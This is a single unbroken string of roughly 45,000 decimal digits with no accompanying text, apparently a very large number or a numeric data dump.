625913328559726371211201905720771409148645074094926718035815157571514050397610963846755569298970383547314100223802583468767350129775413279532060971154506484212185936490997917766874774481882870632315515865032898164228288232746866106592732197907162384642153489852476216789050260998045266483929542357287343977680495774091449538391575565485459058976495198513801007958010783759945775299196700547602252552034453988712538780171960718164078124847847257912407824544361682345239570689514272269750431873633263011103053423335821609333191218806608268341428910415173247216053355849993224548730778822905252324234861531520976938461042582849714963475341837562003014915703279685301868631572488401526639835689563634657435321783493199825542117308467745297085839507616458229630324424328237737450517028560698067889521768198156710781633405266759539424926280756968326107495323390536223090807081455919837355377748742029039018142937311529334644468151212945097596534306284215319445727118614900017650558177095302468875263250119705209476159416768727784472000192789137251841622857783792284439084301181121496366424659033634194540657183544771912446621259392656620306888520055599121235363718226922531781458792593750441448933981608657900876165024635197045828895481793756681046474614105142498870252139936870509372305447734112641354892806841059107716677821238332810262185587751312721179344448201440425745083063944738363793906283008973306241380614589414227694747931665717623182472168350678076487573420491557628217583972975134478990696589532548940335615613167403276472469212505759116251529654568544633498114317670257295661844775487469378464233737238981920662048511894378868224807279352022501796545343757274163910791972952950812942922205347717304184477915673991738418311710362524395716152714669005814700002633010452643547865903290733205468338872078735444762647925297690170912007874183736735087713376977683496344252419949951388315074877537433849458259765560996555954318040920178497184685497370696212088524377013853757681416632722412634423982152941645378000492507262765150789085071265997036708726692764308377229685985169122305037462744310852934305273078865283977335246017463527703205938179125396915621063637625882937571373840754406468964783100704580613446731271591194608435935825987782835266531151065041623295329047772174083559349723758552138048305090009646676088301540612824308740645594431853413755220166305812111033453120745086824339432159043594430312431227471385842030390106070940315235556172767994160020393975099897629335325855575624808996691829864222677502360193257974726742578211119734709402357457222271212526852384295874273501563660093188045493338989741571490544182559738080871565281430102670460284316819230392535297795765862414392701549740879273131051636119137577008929564823323648298263024607975875767745377160102490804624301856524161756655600160859121534556267602192689982855377872583145144082654583484409478463178777374794653580169960779405568701192328608041130904629350871827125934668712766694873899824598527786499569165464029458935064964335809824765965165142090986755203808309203230487342703468288751604071546653834619611223013759451579252696743642531927390036038608236450762698827497618723575476762889950752114804852527950845033958570838130476937881321123674281319487950228066320170022460331989671970649163741175854851878484012054844672588851401562725019821719066960812627785485964818369621410721714214986361918774754509650308957099470934337856981674465828267911940611956037845397855839240761276344105766751024307559814552786167815949657062559755074306521085301597908073343736079432866757890533483669555486803913433720156498834220893399971641479746938696905480089193067138057171505857307148815649920714086758259602876056459782423770242469805328056632787041926768467116266879463486950464507420219373945259262668613552940624781361206202636498199999498405143868285258956342264328707663299304891723400725471764188685351372332667877921738347541480022803392997357936152412755829569276837231234798989446274330454566790062032420516396282588443085438307201495672106460533238537203143242112607424485845094580494081820927639140008540422023556260218564348994145439950410980591817948882628052066441086319001688568155169229486203010738897181007709290590480749092427141018933542818429995988169660993836961644381528877214085268088757488293258735809905670755817017949161906114001908553744882726200936685604475596557476485674008177381703307380305476973609786543859382187220583902344443508867499866506040645874346005331827436296177862518081893144363251205107094690813586440519229512932450078833398788429339342435126343365204385812912834345297308652909783300671261798130316794385535726296998740359570458452230856390098913179475948752126397078375944861139451960286751210561638976008880092746115860800207803341591451797073036835196977766076373785333012024120112046988609209339085365773222392412449051532780950955866459477634482269986074813297302630975028812103517723124465095349653693090018637764094094349837313251321862080214809922685502948454661814715557444709669530177690434272031892770604717784527939160472281534379803539679861424370956683221491465438014593829277393396032754048009552231816667380357183932757077142046723838624617803976292377131209580789363841447929802588065522129262093623930637313496640186619510811583471173312025805866727639992763579078063818813069156366274125431259589936119647626101405563503399523140323113819656236327198961837254845333702062563464223952766943568376761368711962921818754576081617053031590728828700712313666308722754918661395773730546065997437810987649802414011242142773668082751390959313404155826266789510846776118665957660165998178089414985754976284387856100263796543178313634025135814161151902096499133548733131115022700681930135929595971640197196053625033558479980963488718039111612813595968565478868325856437896173159762002419621552896297904819822199462269487137462444729093456470028537694958859591606789282491054412515996300781368367490209374915732896270028656829344431342347351239298259166739503425995868970697267332582735903121288746660451461487850346142827765991608090398652575717263081833494441820193533385071292345774375579344062178711330063106003324053991693682603746176638565758877580201229366353270267100681261825172914608202541892885935244491070138206211553827793565296914576502048643282865557934707209634807372692141186895467322767751335690190153723669036865389161291688887876407525493494249733427181178892759931596719354758988097924525262363659036320070854440784544797348291802082044926670634420437555325050527522833778887040804033531923407685630109347772125639088640413101073817853338316038135280828119040832564401842053746792992622037698718018061122624490909242641985820861751177113789051609140381575003366424156095216328197122335023167422600567941281406217219641842705784328959802882335059828208196666249035857789940333152274817776952843681630088531769694783690580671064828083598046698841098135158654906933319522394363287923990534810987830274500172065433699066117784554364687723631844464768069142828004551074686645392805399409108754939166095731619715033166968309929466349142798780842257220697148875580637480308862995118473187124777291910070227588893486939456289515802965372150409603107761289831263589964893410247036036645058687287589051406841238124247386385427908282733827973326885504935874303160274749063129572349742611221517417153133618622410913869500688835898962349276317316478340077460886655598733382113829928776911495492184192087771606068472874673681886167507221017261103830671787856694812948785048943063086169948798703160515884108282351274153538513365895332948629494495061868514779105804696039069372662670386512905201137810858616188886947957607413585534585151768051973334433495230120395770739623771316030242887200537320998253008977618973129817881944671731160647231476248457551928732782825127182446807824215216469567819294098238926284943760248852279003620219386696482215628093605373178040863727268426696421929946819214908701707533361094791381804063287387593848269535583077395761447997270003472880182785281389503217986345216111066608839314053226944905455527867894417579202440021450780192099804461382547805858048442416404775031536054906591430078158372430123137511562284015838644270890718284816757527123846782459534334449622010096071051370608461801187543120725491334994247617115633321408934609156561550600317384218701570226103101916603887064661438897736318780940711527528174689576401581047016965247557740891644568677717158500583269943401677202156767724068128366565264122982439465133197359199709403275938502669557470231813203243716420586141033606524536939160050644953060161267822648942437397166717661231048975031885732165554988342121802846912529086101485527815277625623750456375769497734336846015607727035509629049392487088406281067943622418704747008368842671022558302403599841645951122485272633632645114017395248086194635840783753556885622317115520947223065437092606797351000565549381224575483728545711797393615756167641692895805257297522338558611388322171107362265816218842443178857488798109026653793426664216990914056536432249301334867988154886628665052346997235574738424830590423677143278792316422403877764330192600192284778313837632536121025336935812624086866699738275977365682227907215832478888642369346396164363308730139814211430306008730666164803678984091335926293402304324974926887831643602681011309570716141912830686577323532639653677390317661361315965553584999398600565155921936759977717933019744688148371103206503693192894521402650915465184309936553493337183425298433679915939417466223900389527673813330617747629574943868716978453767219493506590875711917720875477107189937960894774512654757501871194870738736785890200617373321075693302216320628432065671192096950585761173961632326217708945426214609858410237813215817727602222738133495410481003073275107799948991977963883530734443457532975914263768405442264784216063122769646967156473999043715903323906560726644116438605404838847161912109008701019130726071044114143241976796828547885524779476481802959736049439700479596040292746299203572099761950140348315380947714601056333446998820822120587281510729182971211917876424880354672316916541852256729234429187128163232596965413548589577133208339911288775917226115273379010341362085614577992398778325083550730199818459025958355989260553299673770491722454935329683300002230181517226575787524058832249085821280089747909326100762578770428656006996176212176845478996440705066241710213327486796237430229155358200780141165348065647488230615003392068983794766255036549822805329662862117930628430170492402301985719978948836897183043805182174419147660429752437251683435411217038631379411422095295885798060152938752753799030938871683572095760715221900279379292786303637268765822681241993384808166021603722154710143007377537792699069587121289288019052031601285861825494413353820784883465311632650407642428390870121015194231961652268422003711230464300673442064747718021353070124098860353399152667923871101706221865883573781210935179775604425634694999787251125440854522274810914874307259869602040275941178942581281882159952359658979181144077653354321757595255536158128001163846720319346507296807990793963714961774312119402021297573125165253768017359101557338153772001952444543620071848475663415407442328621060997613243487548847434539665981338717466093020535070271952983943271425371155766600025784423031073429551533945060486222764966687624079324353192992639253731076892135352572321080889819339168668278948281170472624501948409700975760920983724090074717973340788141825195842598096241747610138252643955135259311885045636264188300338539652435997416931322894719878308427600401368074703904097238473945834896186539790594118599310356168436869219485382055780395773881360679549900085123259442529724486666766834641402189915944565309423440650667851948417766779470472041958822043295380326310537494883122180391279678446100139726753892195119117836587662528083690053249004597410947068772912328214304635337283519953648274325833119144459017809607782883583730111857543659958982724531925310588115026307542571493943024453931870179923608166611305426253995833897942971602070338767815033010280120095997252222280801423571094760351925544434929986767817891045559063015953809761875920358937341978962358931125983902598310267193304189215109689156225069659119828323455503059081730735195503721665870288053992138576037035377105178021280129566841984140362872725623214428754302210909472721073474134975514190737043318276626177275996888826027225247133683353452816692779591328861381766349857728936900965749562287103024362590772412219094300871755692625758065709912016659622436080242870024547362036394841255954881727272473653467783647201918303998717627037515724649922289467932322693619177641614618795613956699567783068290316589699430767333508234990790624100202506134057344300695745474682175690441651540636584680463692621274211075399042188716127617787014258864825775223889184599523376292377915585744549477361295525952226578636462118377598473700347971408206994145580719080213590732269233100831759510659019121294795408603640757358750205890208704579670007055262505811420663907459215273309406823649441590891009220296680523325266198911311842016291631076894084723564366808182168657219688268358402785500782804043453710183651096951782335743030504852653738073531074185917705610397395062640355442275156101107261779370634723804990666922161971194259120445084641746383589938239946517395509000859479990136026674261494290066467115067175422177038774507673563742154782905911012619157555870238957001405117822646989944917908301795475876760168094100135837613578591356924455647764464178667115391951357696104864922490083446715486383054477914330097680486878348184672733758436892724310447406807685278625585165092088263813233623148733336714764520450876627614950389949504809560460989604329123358348859990294526400284994280878624039811814884767301216754161106629995553668193123287425702063738352020086863691311733469731741219153633246745325630871347302792174956227014687325867891734558379964351358800959350877556356248810493852999007675135513527792412429277488565888566513247302514710210575352516511814850902750476845518252096331899068527614435138213662152368890578786699432288816028377482035506016029894009119713850179871683633744139275973644017007014763706655703504338121113576415018451821413619823495159601064752712575935185304332875537783057509567425442684712219618709178560783936144511383335649103256405733898667178123972237519316430617013859539474367843392670986712452211189690840236327411496601243483098929941738030588417166613073040067588380432111555379440605497721705942821514886165672771240903387727745629097110134885184374118695655449745736845218066982911045058004299887953899027804383596282409421860556287788428802127553884803728640019441614257499904272009595204654170598104989967504511936471172772220436102614079750809686975176600237187748348016120310234680567112644766123747627852190241202569943534716226660893675219833111813511146503854895025120655772636145473604426859498074396932331297127377157347099713952291182653485155587137336629120242714302503763269501350911612952993785864681307226486008270881333538193703682598867893321238327053297625857382790097826460545598555131836688844628265133798491667839409761353766251798258249663458771950124384040359140849209733754642474488176184070023569580177410177696925077814893386672557898564589851056891960924398841569280696983352240225634570497312245269354193837004843183357196516626721575524193401933099018319309196582920969656247667683659647019595754739345514337413708761517323677204227385674279170698204549953095918872434939524094441678998846319845504852393662972079777452814399418256789457795712552426826089940863317371538896262889629402112108884427376568624527612130371017300785135715404533041507959447776143597437803742436646973247138410492124314138903579092416036406314038149831481905251720937103964026808994832572297954564042701757722904173234796073618787889913318305843069394825961318713816423467218730845133877219086975104942843769325024981656673816260615941768252509993741672883951744066932549653403101452225316189009235376486378482881344209870048096227171226407489571939002918573307460104360729190945767994614929290427981687729426487729952858434647775386906950148984133924540394144680263625402118614317031251117577642829914644533408920976961699098372652361768745605894704968170136974909523072082682887890730190018253425805343421705928713931737993142410852647390948284596418093614138475831136130576108462366837237695913492615824516221552134879244145041756848064120636520170386330129532777699023118648020067556905682295016354931992305914246396217025329747573114094220180199368035026495636955866425906762685687372110339156793839895765565193177883000241613539562437777840801748819373095020699900890899328088397430367736595524891300156633294077907139615464534088791510300651321934486673248275907946807879819425019582622320395131252014109960531260696555404248670549986786923021746989009547850725672978794769888831093487464426400718183160331655511534276155622405474473378049246214952133258527698847336269182649174338987824789278468918828054669982303689939783413747587025805716349413568433929396068192061773331791738208562436433635359863494496890781064019674074436583667071586924521182997893804077137501290858646578905771426833582768978554717687184427726120509266486102051535642840632368481807287940717127966820060727559555904040233178749447346454760628189541512139162918444297651066947969354016866010055196077687335396511614930937570968554559381513789569039251014953265628147011998326992200066392875374713135236421589265126204072887716578358405219646054105435443642166562244565042999010256586927279142752931172082793937751326106052881235373451068372939893580871243869385934389175713376300720319760816604464683937725806909237297523486702916910426369262090199605204121024077648190316014085863558427609537086558164273995349346546314504040199528537252004957805254656251154109252437991326262713609099402902262062836752132305065183934057450112099341464918433323646569371725914489324159006242020612885732926133596808726500045628284557574596592120530341310111827501306961509835515632004310784601906565493806542525229161991819959602752327702249855738824899882707465936355768582560518068964285376850772012220347920993936179268206590142165615925306737944568949070853263568196831861772268249911472615732035807646298116244013316737892788689229032593349861797021994981925739617673075834417098559222170171825712777534491508205278430904619460835217402005838672849709411023266953921445461066215006410674740207009189911951376466904481267253691537162290791385403937560077835153374167747942100384002308951850994548779039346122220865060160500351776264831611153325587705073541279249909859373473787081194253055121436979749914951860535920403830235716352727630874693219622190064260886183676103346002255477477813641012691906569686495012688376296907233961276287223041141813610060264044030035996988919945827397624114613744804059697062576764723766065541618574690527229238228275186799156983390747671146103022776606020061246876477728819096791613354019881402757992174167678799231603963569492851513633647219540611171767387372555728522940054361785176502307544693869307873499110352182532929726044553210797887711449898870911511237250604238753734841257086064069052058452122754533848008205302450456517669518576913200042816758054924811780519832646032445792829730129105318385636821206215531288668564956512613892261367064093953334570526986959692350353094224543865278677673027540402702246384483553239914751363441044050092330361271496081355490531539021002299595756583705381261965683144286057956696622154721695620870013727768536960840704833325132793112232507148630206951245395003735723346807094656483089209801534878705633491092366057554050864111521441481434630437273271045027768661953107858323334857840297160925215326092558932655600672124359464255065996771770388445396181632879614460817789272171836908880126778207430106422524634807454300476492885553409062185153654355474125476152769772667769772777058315801412185688011705028365275543214803488004442979998062157904564161957212784508928489806426497427090579129069217807298769477975112447305991406050629946894280931034216416629935614828130998870745292716048433630818404126469637925843094185442216359084576146078558562473814931427078266215185541603870206876980461747400808324343665382354555109449498431093494759944672673665352517662706772194183191977196378015702169933675083760057163454643671776723387588643405644871566964321041282595645349841388412890420682047007615596916843038999348366793542549210328113363184722592305554383058206941675629992013373175489122037230349072681068534454035993561823576312837767640631013125335212141994611869350833176587852047112364331226765129964171325217513553261867681942338790365468908001827135283584888444111761234101179918709236507184857856221021104009776994453121795022479578069506532965940383987369907240797679040826794007618729547835963492793904576973661643405359792219285870574957481696694062334272619733518136626063735982575552496509807260123668283605928341855848026958413772558970883789942910549800331113884603401939166122186696058491571485733568286149500019097591125218800396419762163559375743718011480559442298730418196808085647265713547612831629200449880315402105530597076666362749328308916880932359290081787411985738317192616728834918402429721290434965526942726402559641463525914348400675867690350382320572934132981593533044446496829441367323442158380761694831219333119819061096142952201536170298575105594326461468505452684975764807808009221335811378197749271768545075538328768874474591593731162470601091244609829424841287520224462594477638749491997840446829257360968534549843266536862844489365704111817793806441616531223600214918768769467398407517176307516849856359201486892943105940202457969622924566644881967576294349535326382171613395757790766370764569570259738800438415805894336137106551859987600754924187211714889295221737721146081154344982665479872580056674724051122007383459271575727715218589946948117940644466399432370044291140747218180224825837736017346685300744985564715420036123593397312914458591522887408719508708632218837288262822884631843717261903305777147651564143822306791847386039147683108141358275755853643597721650028277803713422869688787349795096031108899196143386664068450697420787700280509367203387232629637856038653216432348815557557018469089074647879122436375556668678067610544955017260791142930831285761254481944449473244819093795369008206384631678225064809531810406570254327604385703505922818919878065865412184299217273720955103242251079718077833042609086794273428955735559252723805511440438001239041687716445180226491681641927401106451622431101700056691121733189423400547959684669804298017362570406733282129962153684881404102194463424646220745575643960452985313071409084608499653767803793201899140865814662175319337665970114330608625009829566917638846056762972931464911493704624469351984039534449135141193667933301936617663652555149174982307987072280860859626112660504289296966535652516688885572112276802772743708917389639772257564890533401038855931125679991516589025016486961427207005916056166159702451989051832969278935550303934681219761582183980483960562523091462638447386296039848924386187298507775928792722068554807210497817653286210187476766897248841139560349480376727036316921007350834073865261684507482496448597428134936480372426116704266870831925040997615319076855770327421785010006441984124207396400139603601583810565928413684574119102736420274163723488214524101347716529603128408658419787951116511529827814620379139855006399960326591248525308493690313130100799977191362230866011099929142871249388541612038020411340188887219693477904497527454288072803509305828754420755134816660927879353566521255620139988249628478726214432362853676502591450468377635282587652139156480972141929675549384375582600253168536356731379262475878049445944183429172756988376226261846365452743497662411138451305481449836311789784489732076719508784158618879692955819733250699951402601511675529750575437810242238957925786562128432731202200716730574069286869363930186765958251326499145950260917069347519408975357464016830811798846452473618956056479426358070562563281189269663026479535951097127659136233180866921535788607812759910537171402204506186075374866306350591483916467656723205714516886170790984695932236724946737583099607042589220481550799132752088583781117685214269334786921895240622657921043620348852926267984013953216458791151579050460579710838983371864038024417511347226472547010794793996953554669619726763255229914654933499663234185951450360980344092212206712567698723427940708857070474293173329188523896721971353924492426178641188637790962814486917869468177591717150669111480020759432012061969637795103227089029566085562225452602610460736131368869009281721068198618553780982018471154163630326265699283424155023600978046417108525537612728905335045506135684143775854429677977014660294387687225115363801191758154028120818255606485410787933598921064427244898618961629413418001295130683638609294100083136673372153008352696235737175330738653338204842190308186449184093723944033405244909554558016406460761581010301767488475017661908692946098769201691202181688291040870709560951470416921147027413390052253340834812870353031023919699978597413908593605433599697075604460134242453682496098772581311024732798562072126572499003468293886872304895562253204463602639854225258416464324271611419817802482595563544907219226583863662663750835944314877635156145710745528016159677048442714194435183275698407552677926411261765250615965235457187956673170913319358761628255920783080185206890151504713340386100310055914817852110384754542933389188444120517943969970194112695119526564919594189975418393234647424290702718875223534393673633663200307232747037407123982562024662651974090199762452056198557625760008708173083288344381831070054514493545885422678578551915372292379555494333410174420169600090696415612732297770221217951868376359082255128816470021992348864043959153018464004714321186360622527011541122283802778538911098490201342741014121559769965438877197485376431158229838533123071751132961904559007938064276695819014842627991221792947987348901868471676503827328552059082984529806259250352128451925927986593506132961946796252373972565584157853744567558998032405492186962888490332560851455344391660226257775512916200772796852629387937530454181080729285891989715381797343496187232927614747850192611450413274873242970583408471112333746274617274626582415324271059322506255302314738759251724787322881491455915605036334575424233779160374952502493022351481961381162563911415610326844958072508273431765944054098269765269344579863479709743124498271933113863873159636361218623497261409556079920628316999420072054811525353393946076850019909886553861433495781650089961649079678142901148387645682174914075623767618453775144031475411206760160726460556859257799322070337333398916369504346690694828436629980037414527627716547623825546170883189810868806847853705536480469350958818025360529740793538676511195079373282083146268960071075175520614433784114549950136432446328193346389050936545714506900864483440180428363390513578157273973334537284263372174065775771079830517555721036795976901889958494130195999573017901240193908681356585539661941371794487632079868800371607303220547423572266896801882123424391885984168972277652194032493227314793669234004848976059037958094696041754279613782553781223947646147832926976545162290281701100437846038756544151739433960048915318817576650500951697402415644771293656614253949368884230517400129920556854289853897942669956777027089146513736892206104415481662156804219838476730871787590279209175900695273456682026513373111518000181434120962601658629821076663523361774007837783423709152644063054071807843358061072961105550020415131696373046849213356837265400307509829089364612047891114753037049893952833457824082817386441322710002968311940203323456420826473276233830294639378998375836554559919340866235090967961134004867027123176526663710778725111860354037554487418693519733656621772359229396776463251562023487570113795712096237723431370212031004965152111976013176419408203437348512852602913334915125083119802850177855710725373149139215709105130965059885999931560863655477403551898166733535880048214665099741433761182777723351910741217572841592580872591315074606025634903777263373914461377038021318347447301113032670296917335047701632106616227830027269283365584011791419447808748253360714403296252285775009808599609040936312635621328162071453406104224112083010008587264252112262480142647519426184325853386753874054743491072710049754281159466017136122590440158991600229827801796035194080046513534752698777609527839984368086908989197839693532179980139135442552717910225397010810632143048511378291498511381969143043497500189980681644412123273328307192824362406733196554692677851193152775113446468905504248113361434984604849051258345683266441528489713972376040328212660253516693914082049947320486021627759791771234751097502403078935759937715095021751693555827072533911892334070223832077585802137174778378778391015234132098489423459613692340497998279304144463162707214796117456975719681239291913740982925805561955207434243295982898980529233366415419256367380689494201471241340525072204061794355252555225008748790086568314542835167750542294803274783044056438581591952666758282929705226127628711040134801787224801789684052407924360582742467443076721645270313451354167649668901274786801010295133862698649748212118629040337691568576240699296372493097201628707200189835423690364149270236961938547372480329855045112089192879829874467864129159417531675602533435310626745254507114181483239880607297140234725520713490798398982355268723950909365667878992383712578976248755990443228895388377317348941122757071410959790047919301046740750411435381782464630795989555638991884773781341347070246747362112048986226991888517456251732519341352038115863350123913054441910073628447567514161050410973505852762044489190978901984315485280533985777844313933883994310444465669244550885946314081751220331390681596592510546858013133838152176418210433429788826119630443111388796258746090226130900849975430395771243230616906262919403921439740270894777663702488155499322458825979020631257436910946393252806241642476868495455324938017639371615636847859823715902385421265840615367228607131702674740131145261063765383390315921943469817605358380310612887852051546933639241088467632009567089718367490578163085158138161966882222047570437590614338040725853862083565176998426774523195824182683698270160237414938363496629351576854061397342746470899685618170160551104880971554859118617189668025973541705423985135560018720335079060946421271143993196046527424050882225359773481519135438571253258540493946010865793798058620143366078825219717809025817370870916460452727977153509910340736425020386386718220522879694458387652947951048660717390229327455426785669776865939923416834122274663015062155320502655341460995249356050854921756549134830958906536175693817637473644183378974229700703545206663170929607591989627732423090252397443861014263098687733913882518684316501027964911497737582888913450341148865948670215492101084328080783428089417298008983297536940644969903125399863919581601468995220880662285408414864274786281975546629278814621607171381880180840572084715868906836919393381864278454537956719272397972364651667592011057995663962598535512763558768140213409829016296873429850792471846056874828331381259161962476156902875901072733103299140623864608333378638257926302391590003557609032477281338887339178096966601469615031754226751125993315529674213336300222964906480934582008181061802100227664580400278213336758573019011371754672763059044353131319036092489097246427928455549913490005180295707082919052556781889913899625138662319380053611346224294610248954072404857123256628888931722116432947816190554868054943441034090680716088028227959686950133643814268252170472870863010137301155236861416908375675747637239763185757038109443390564564468524183028148107998376918512127201935044041804604721626939445788377090105974693219720558114078775989772072009689382249303236830515862657281114637996983137517937623215111252349734305240622105244234353732905655163406669506165892878218707756794176080712973781335187117931650033155523822487730653444179453415395202424449703410120874072188109388268167512042299404948179449472732894770111574139441228455521828424922240658752689172272780607116754046973008037039618787796694882555614674384392570115829546661358678671897661297311267200072971553613027503556167817765442287442114729881614802705243806817653573275578602505847084013208837932816008769081300492491473682517035382219619039014999523495387105997351143478292339499187936608692301375596368532373806703591144243268561512109404259582639301678017128669239283231057658851714020211196957064799814031505633045141564414623163763809904402816256917576489142569714163598439317433270237812336938043012892626375382667795034169334323607500248175741808750388475094939454896209740485442635637164995949920980884294790363666297526003243856352945844728944547166209297495496616877414120882130477022816116456044007236351581149729739218966737382647204722642221242016560150284971306332795814302516013694825567014780935790889657134926158161346901806965089556310121218491805847922720691871696316330044858020102860657858591269974637661741463934159569539554203314628026518951167938074573315759846086173702687867602943677780500244673391332431669880354073232388281847501051641331189537036488422690270478052742490603492082954755054003457160184072574536938145531175354210726557835615499874447480427323457880061873149341566046352979779455075359304795687209316724536547208381685855606043801977030764246083489876101345709394877002946175792061952549255757109038525171488525265671045349813419803390641529876343695420256080277614421914318921393908834543131769685101840103844472348948869520981943531906506555354617335814045544837884752526253949665869992058417652780125341033896469818642430034146791380619028059607854888010789705516946215228773090104467462497979992627120951684779568482583341402266477210843362437593741610536734041954738964197895425335036301861400951534766961476255651873823292468547356935802896011536791787303553159378363082248615177770541577576561759358512016692943111138863582159667618830326104164651714846979385422621687161400122378213779774131268977266712992025922017408770076956283473932201088159356286281928563571893384958850603853158179760679479840878360975960149733420572704603521790605647603285569276273495182203236144112584182426247712012035776388895974318232827871314608053533574494297621796789034568169889553518504478325616380709476951699086247100019748809205009521943632378719764870339223811540363475488626845956159755193765410115014067001226927474393888589943859730245414801061235908036274585288493563251585384383242493252666087588908318700709100237377106576985056433928854337658342596750653715005333514489908293887737352051459333049626531415141386124437935885070944688045486975358170212908490787347806814366323322819415827345671356443171537967818058195852464840084032909981943781718177302317003989733050495387356116261023999433259780126893432605584710278764901070923443884634011735556865903585244919370181041626208504299258697435817098133894045934471937493877624232409852832762266604942385129709453245586252103600829286649724174919141988966129558076770979594795306013119159011773943104209049079424448868513086844493705909026006120649425744710353547657859242708130410618546219881830090634588187038755856274911587375421064667951346487586771543838018521348281915812462599335160198935595167968932852205824799421034512715877163345222995418839680448835529753361286837225935390079201666941339091168758803988828869216002373257361588207163516271332810518187602104852180675526648673908900907195138058626735124312215691637902277328705410842037841525683288718046987952513073266340278519059417338920358540395677035611329354482585628287610610698229721420961993509331312171187891078766872044548876089410174798647137882462153955933333275562009439580434537919782280590395959927436913793778664940964048777841748336432684026282932406260081908081804390914556351936856063045089142289645219987798849347477729132797266027658401667890136490508741142126861969862044126965282981087045479861559545338021201155646979976785738920186243599326777689454060508218838227909833627167124490026761178498264377033002081844590009717235204331994708242098771514449751017055643029542821819670009202515615844174205933658148134902693111517093872260026458630561325605792560927332265579346280805683443921373688405650434307396574061017779370141424615493070741360805442100295600095663588977899267630517718781943706761498217564186590116160865408635391513039201316805769034172596453692350806417446562351523929050409479953184074862151210561833854566176652606393713658802521666223576132201941701372664966073252010771947931265282763302413805164907174565964853748354669194523580315301969160480994606814904037819829732360930087135760798621425422096419004367905479049930078372421581954535418371129368658430553842717628035279128821129308351575656599944741788438381565148434229858704245592434693295232821803508333726283791830216591836181554217157448465778420134329982594566884558266171979012180849480332448787258183774805522268151011371745368417870280274452442905474518234674919564188551244421337783521423865979925988203287085109338386829906571994614906290257427686038850511032638544540419184958866538545040571323629681069146814847869659166861842756798460041868762298055562963045953227923051616721591968675849523635298935788507746081537321454642984792310511676357749494622952569497660359473962430995343310404994209677883827002714478494069037073249106444151696053256560586778757417472110827435774315194060757983563629143326397812218946287447798119807225646714664054850131009656786314880090303749338875364183165134982546694673316118123364854397649325026179549357204305402182974871251107404011611405899911093062492312813116340549262571356721818628932786138833718028535056503591952741400869510926167541476792668032109237467087213606278332922386413619594121339278036118276324106004740971111048140003623342714514483334641675466354699731494756643423659493496845884551524150756376605086632827424794136062876041290644913828519456402643153225858624043141838669590633245063000392213192647625962691510904457695301444054618037857503036686212462278639752746667870121003392984873375014475600322100622358029343774955032037012738468163061026570300872275462966796880890587127676361066225722352229739206443093524327228100859973095132528630601105497915644791845004618046762408928925680912930592960642357021061524646205023248966593987324933967376952023991760898474571843531936646529125848064480196520162838795189499336759241485626136995945307287254532463291529110128763770605570609531377527751867923292134955245133089867969165129073841302167573238637575820080363575728002754490327953079900799442541108725693188014667935595834676432868876966610097395749967836593397846346959948950610490383647409504695226063858046758073069912290474089879166872117147527644711604401952718169508289733537148530928937046384420893299771125856840846608339934045689026787516008775461267988015465856522061210953490796707365539702576199431376639960606061106406959330828171876426043573425361756943784848495250108266488395159700490598380812105221111091943323951136051446459834210799058082093716464523127704023160072138543723461267260997870385657091998507595634613248460188409850194287687902268734556500519121546544063829253851276317663922050938345204300773017029940362615434001322763910912988327863920412300445551684054889809080779174636092439334912641164240093880746356607262336695842764583698268734815881961058571835767462009650526065929263548291499045768307210893245857073701660717398194485028842603963660746031184786225831056580870870305567595861341700745402965687634774176431051751036732869245558582082372038601781739405175130437994868822320044378043103170921034261674998000073016094814586374488778522273076330495383944345382770608760763542098445008306247630253572781032783461766970544287155315340016497076657195985041748199087201490875686037783591994719343352772947285537925787684832301101859365800717291186967617655053775030293033830706448912811412025506150896411007623824574488655182581058140345320124754723269087547507078577659732542844459353044992070014538748948226556442223696365544194225441338212225477497535494624827680533336983284156138692363443358553868471111430498248398991803165458638289353799130535222833430137953372954016257623228081138499491876144141322933767106563492528814528239506209022357876684650116660097382753660405446941653422239052108314585847035529352219928272760574821266065291385530345549744551470344939486863429459658431024190785923680224560763936784166270518555178702904073557304620639692453307795782245949710420188043000183881429008173039450507342787013124466860092778581811040911511729374873627887874907465285565434748886831064110051023020875107768918781525622735251550379532444857787277617001964853703555167655209119339343762866284619844026295252183678522367475108809781507098978413086245881522660963551401874495836926917799047120726494905737264286005211403581231076006699518536124862746756375896225299116496066876508261734178484789337295056739007878617925351440621045366250640463728815698232317500596261080921955211150859302955654967538862612972339914628358476048627627027309739202001432248707582337354915246085608210328882974183906478869923273691360048837436615223517058437705545210815513361262142911815615301758882573594892507108879262128641392443309383797333867806131795237315266773820858024701433527009243803266951742119507670884326346442749127558907746863582162166042741315170212458586056233631493164646913946562497471741958354218607748711057338458433689939645913740603382159352243594751626239188685307822821763983237306180204246560477527943104796189724299533029792497481684052893791044947004590864991872727345413508101983881864673609392571930511968645601855782450218231065889437986522432050677379966196955472440585922417953006820451795370043472451762893566770508490213107736625751697335527462302943031203596260953423574397249659211010657817826108745318874803187430823573699195156340957162700992444929749105489851519658664740148225106335367949737142510229341882585117371994499115097583746130105505064197721531929354875371191630262030328588658528480193509225875775597425276584011721342323648084027143356367542046375182552524944329657043861387865901965738802868401894087672816714137033661732650120578653915780703088714261519075001492576112927675193096728453971160213606303090542243966320674323582797889332324405779199278484633339777737655901870574806828678347965624146102899508487399692970750432753029972872297327934442988646412725348160603779707298299173029296308695801996312413304939350493325412355071054461182591141116454534710329881047844067780138077131465400099386306481266614330858206811395838319169545558259426895769841428893743467084107946318932539106963955780706021245974898293564613560788983472419979478564362042094613412387613198865352358312996862268948608408456655606876954501274486631405054735351746873009806322780468912246821460806727627708402402266155485024008952891657117617439020337584877842911289623247059191874691042005848326140677333751027195653994697162517248312230633919328707983800748485726516123434933273356664473358556430235280883924348278760886164943289399166399210488307847777048045728491456303353265070029588906265915498509407972767567129795010098229476228961891591441520032283878773485130979081019129267227103778898053964156362364169154985768408398468861684375407065121039062506128107663799047908879674778069738473170475253442156390387201238806323688037017949308954900776331523063548374256816653361606641980030188287123767481898330246836371488309259283375902278942588060087286038859168849730693948020511221766359138251524278670094406942355120201568377778851824670025651708509249623747726813694284350062938814429987905301056217375459182679973217735029368928065210025396268807498092643458011655715886700443503976505323478287327368840863540002740676783821963522226539290939807367391364082898722017776747168118195856133721583119054682936083236976113450281757830202934845982925000895682630271263295866292147653142233351793093387951357095346377183684092444422096319331295620305575517340067973740614162107923633423805646850092037167152642556371853889571416419772387422610596667396997173168169415435095283193556417705668622215217991151355639707143312893657553844648326201206424338016955862698561022460646069330793847858814367407000599769703649019273328826135329363112403650698652160638987250267238087403396744397830258296894256896741864336134979475245526291426522842419243083388103580053787023999542172113686550275341362211693140694669513186928102574795985605145005021715913317751609957865551981886193211282110709442287240442481153406055895958355815232012184605820563592699303478851132068626627588771446035996656108430725696500563064489187599466596772847171539573612108180841547273142661748933134174632662354222072600146012701206934639520564445543